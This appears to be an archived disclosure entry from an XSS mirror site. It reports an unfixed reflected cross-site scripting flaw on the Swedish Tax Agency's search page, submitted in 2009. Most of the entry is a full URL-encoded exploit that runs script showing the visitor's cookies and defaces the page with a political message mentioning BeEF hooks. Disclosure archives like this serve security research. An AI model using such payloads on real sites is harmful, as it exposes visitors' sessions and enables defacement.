Security researcher DellNull submitted a cross-site scripting (XSS) vulnerability affecting www.skatteverket.se on 15/05/2009. At the time of submission, the site ranked 17998 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/11/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 15/05/2009 |
Date published: 21/11/2010 |
Status: UNFIXED |
Author: DellNull |
Domain: www.skatteverket.se |
Category: XSS |
Pagerank: 17998 |
URL: http://www.skatteverket.se/funktioner/sok/sok.4.5732cd2411150a57de580004325.html?sv.search.query.all words=%3CSCRIPT%3E%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert(%27This+is+a+cookie+from+the+Swedish+National+Tax +Board!\n%27%2Bdocument.cookie)%3B%3C%2FSCRIPT%3E%3Ch1%3E%3Cfont+color%3D%22red%22+size%3D%22%2B5%22 %3EThe+Swedish+National+Tax+Board!+%3Cbr%3E+You+take+more+than+47%25+of+peoples+income+as+burden+of+ taxation.+I%27m+sure+not+a+penny+of+that+is+invested+in+security%2C+see+%3Ca+href+%3D%27http%3A%2F%2 Fxssed.com%2Fsearch%3Fkey%3Dskatteverket.se%27%3Ehttp%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dskatteverke t.se%3C%2Fa%3E+It%27s+a+shame+that+a+government+authority+that+handles+sensitive+record+about+swedis h+citizens+is+prone+to+security+flaws+in+their+systems!+What+if+someone+places+a+xss+proxy+hook+(lik e+BeEF)+here%3F+The+privacy+for+swedish+citizens+is+supposed+to+be+protected+by+constitutional+laws. +So+live+by+the+law+or+die+by+the+law%3Cbr%3E%3Cbr%3E-+DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg+src%3D %27http%3A%2F%2Ftreesflowersbirds.files.wordpress.com%2F2009%2F02%2Ftax-collector.jpg%27%3E%3C%2Ffon t%3E%3C%2Fh1%3E&submit=S%C3%B6k&sv.search.hits.startonhit=0 |